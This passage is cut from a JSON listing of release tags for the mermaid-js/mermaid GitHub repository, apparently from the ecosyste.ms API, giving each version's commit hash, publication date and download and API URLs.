d58cac5f6","kind":"tag","published_at":"2024-08-24T07:06:16.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.0.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.0.2/manifests"},{"name":"@mermaid-js/layout-elk@0.1.1","sha":"158f9925cedd6e1a205635bd1b45e6dd58cac5f6","kind":"tag","published_at":"2024-08-24T07:06:16.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.1/manifests"},{"name":"@mermaid-js/parser@0.2.0","sha":"158f9925cedd6e1a205635bd1b45e6dd58cac5f6","kind":"tag","published_at":"2024-08-24T07:06:16.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/parser@0.2.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/parser@0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Fparser%400.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.2.0/manifests"},{"name":"mermaid@11.0.1","sha":"4d10e3f2586fb8b08b72d93a1036a17d53153997","kind":"tag","published_at":"2024-08-23T15:04:26.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.0.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.0.1/manifests"},{"name":"v11.0.0","sha":"2cfdd1620a8ceef37c0b738569dfb8bcc0005547","kind":"commit","published_at":"2024-08-23T12:07:47.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v11.0.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v11.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v11.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v11.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v11.0.0/manifests"},{"name":"v10.9.1","sha":"dab26df9c4ca69cc4a8c46a22286a2f63ea9ed3e","kind":"commit","published_at":"2024-05-14T10:55:39.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.9.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.1/manifests"},{"name":"v10.9.0","sha":"da33867ad798872d9f8406532263ff5e569f1185","kind":"commit","published_at":"2024-03-05T17:22:07.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.9.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.0/manifests"},{"name":"v10.8.0","sha":"51e7444b94ab0b872eaabc3b138184b47442fab4","kind":"commit","published_at":"2024-02-02T10:10:42.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.8.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.8.0/manifests"},{"name":"v10.7.0","sha":"dc857f804e955484b2f92cefc0aaa7b4afb159c4","kind":"commit","published_at":"2024-01-15T09:17:03.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.7.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.7.0/manifests"},{"name":"v10.6.1","sha":"65daab2aaf8fc3e54f34b2d468d19486034e06c7","kind":"commit","published_at":"2023-11-06T13:57:01.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.6.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.6.1/manifests"},{"name":"v10.6.0","sha":"29942c04dc92a64f8c618d6d55f9b57800341cf5","kind":"commit","published_at":"2023-10-25T09:07:12.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.6.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.6.0/manifests"},{"name":"v10.5.1","sha":"b70959daa7666d25416ab3c4b89ffbc328927d20","kind":"commit","published_at":"2023-10-20T12:30:52.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.5.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.5.1/manifests"},{"name":"v10.5.0","sha":"bb0d549d0dc489767b240a910a6831b4a7771fd2","kind":"commit","published_at":"2023-10-02T08:00:13.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.5.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.5.0/manifests"},{"name":"v10.4.0","sha":"8e5275d8441def82597db534f5a15b27cc6376a7","kind":"commit","published_at":"2023-08-25T12:19:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.4.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.4.0/manifests"},{"name":"v10.3.1","sha":"a0b80f5490f812ccbc74d6246f2ecc39b03db147","kind":"commit","published_at":"2023-08-11T12:03:56.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.3.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.3.1/manifests"},{"name":"v10.3.0","sha":"165e0b6c6862e183c9bdb75fbc5839555bbc99d0","kind":"commit","published_at":"2023-07-26T07:49:15.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.3.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.3.0/manifests"},{"name":"v10.2.4","sha":"453b337e6e0e6f02357293764c27c29c236fe848","kind":"commit","published_at":"2023-06-30T11:10:22.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.2.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.4/manifests"},{"name":"v10.2.3","sha":"75f9de3d4ae79b8939607872fa9467d5413855ff","kind":"commit","published_at":"2023-06-08T14:24:25.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.2.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.3/manifests"},{"name":"v10.2.2","sha":"d2409dc1638f1e8c3d006a3350b598d69d2f7a50","kind":"commit","published_at":"2023-06-02T06:50:59.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.2.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.2/manifests"},{"name":"v10.2.1","sha":"48e5d743b3bb0264390644b0d054850d821097e5","kind":"commit","published_at":"2023-06-01T11:03:14.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.2.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.1/manifests"},{"name":"v10.2.0","sha":"8d43b87200ba0b59f6800942e03154dccc6b57b7","kind":"commit","published_at":"2023-05-24T17:03:22.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.2.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.0/manifests"},{"name":"v10.1.0","sha":"e7c237dcf3062cd6163e129aedc620ef08d6f89a","kind":"commit","published_at":"2023-04-04T13:19:15.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.1.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.1.0/manifests"},{"name":"v9.4.3","sha":"1a7b8d38970f367e273b61599e6c4f75a8635158","kind":"commit","published_at":"2023-03-07T18:00:44.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.4.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v9.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.4.3/manifests"},{"name":"v9.4.2","sha":"c965e4c4564441975b71f0996e3a7ec2167ae21d","kind":"commit","published_at":"2023-03-07T15:50:32.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.4.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v9.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.4.2/manifests"},{"name":"v10.0.2","sha":"20298d243ad1bf0447800a3ec24851d6bac8b6fa","kind":"commit","published_at":"2023-03-02T12:45:56.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.0.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.0.2/manifests"},{"name":"v10.0.1","sha":"4a9d96aaba6c5a1ebb295d085b421d9102d83e96","kind":"commit","published_at":"2023-03-01T13:04:03.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.0.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.0.1/manifests"},{"name":"v10.0.0","sha":"555d4f2cdc83ebeaf0b41f57a05722ffb6d921af","kind":"commit","published_at":"2023-02-21T07:57:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.0.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.0.0/manifests"},{"name":"v9.4.0","sha":"97614b8af56a122022a71267996c0646b4a1e312","kind":"commit","published_at":"2023-02-15T14:54:02.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.4.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v9.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.4.0/manifests"},{"name":"v9.3.0","sha":"5735efacbe58634dcff91317170be2e010b7283e","kind":"commit","published_at":"2022-12-15T09:16:12.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.3.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v9.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.3.0/manifests"},{"name":"v9.2.2","sha":"9bb0ed2040cce9be83c63e097e26e4b361a8bdd6","kind":"commit","published_at":"2022-11-09T14:54:39.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.2.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v9.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.2.2/manifests"},{"name":"v9.2.1","sha":"ba7f83019f06d092a4549b98ebc97679fda196a8","kind":"commit","published_at":"2022-11-08T14:25:05.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.2.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v9.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.2.1/manifests"},{"name":"v9.2.0","sha":"e78ac9b92a75223df728b4a1866a8d7d460a4691","kind":"commit","published_at":"2022-11-01T14:27:20.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.2.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v9.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.2.0/manifests"},{"name":"v9.1.7","sha":"0c0468123fa1ca08baf69716eeca0b8872075b5e","kind":"commit","published_at":"2022-09-13T17:55:34.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.1.7","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v9.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.1.7/manifests"},{"name":"9.1.6","sha":"a89b6fd0549a91fb09e72c4e40decf5a0b866828","kind":"commit","published_at":"2022-08-18T17:57:58.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.1.6","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.6/manifests"},{"name":"9.1.5","sha":"af8a5cbbfac33c54d4b1615611fdcc7575180ef1","kind":"commit","published_at":"2022-08-11T18:29:15.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.1.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.5/manifests"},{"name":"9.1.4","sha":"4dcf7feec02ed40e86ff23f78430e1074b6d5ab6","kind":"commit","published_at":"2022-08-04T18:25:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.1.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.4/manifests"},{"name":"9.1.3","sha":"1509ee68bede6c6dc12bcc196d54b89f3b97ac4a","kind":"tag","published_at":"2022-06-28T18:03:42.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.1.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.3/manifests"},{"name":"9.1.2","sha":"3b8d74f1f9be198617491809535158bdc83c2ed2","kind":"tag","published_at":"2022-06-14T17:31:19.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.1.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.2/manifests"},{"name":"9.1.1","sha":"5a9ec30803398464688f7e460fc66a008814d7a2","kind":"tag","published_at":"2022-05-11T12:29:16.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.1.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.1/manifests"},{"name":"9.1.0","sha":"8889b05d29442062c9162458fa595d5abd3903d4","kind":"tag","published_at":"2022-05-10T16:46:08.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.1.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.0/manifests"},{"name":"9.0.1","sha":"179584b4bbfd3738d51021272819e48648b30614","kind":"tag","published_at":"2022-04-21T20:06:16.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.0.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.0.1/manifests"},{"name":"9.0.0","sha":"f72d3c43723c30ba1eec825d97e46fae84e5b502","kind":"tag","published_at":"2022-04-07T18:47:11.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.0.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.0.0/manifests"},{"name":"8.14.0","sha":"cbe3a9159db4d5e67d270fe701cd63de1510f6ee","kind":"tag","published_at":"2022-02-10T17:57:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.14.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.14.0/manifests"},{"name":"8.13.11","sha":"3877b88e6e1dba5d3e52ea23fad66d0545ec5ab0","kind":"commit","published_at":"2022-02-10T16:10:44.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.11","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.11/manifests"},{"name":"8.13.10","sha":"2de2cb64f8d0fa6917e0fae071c0a03bba10df83","kind":"commit","published_at":"2022-01-22T09:11:06.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.10","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@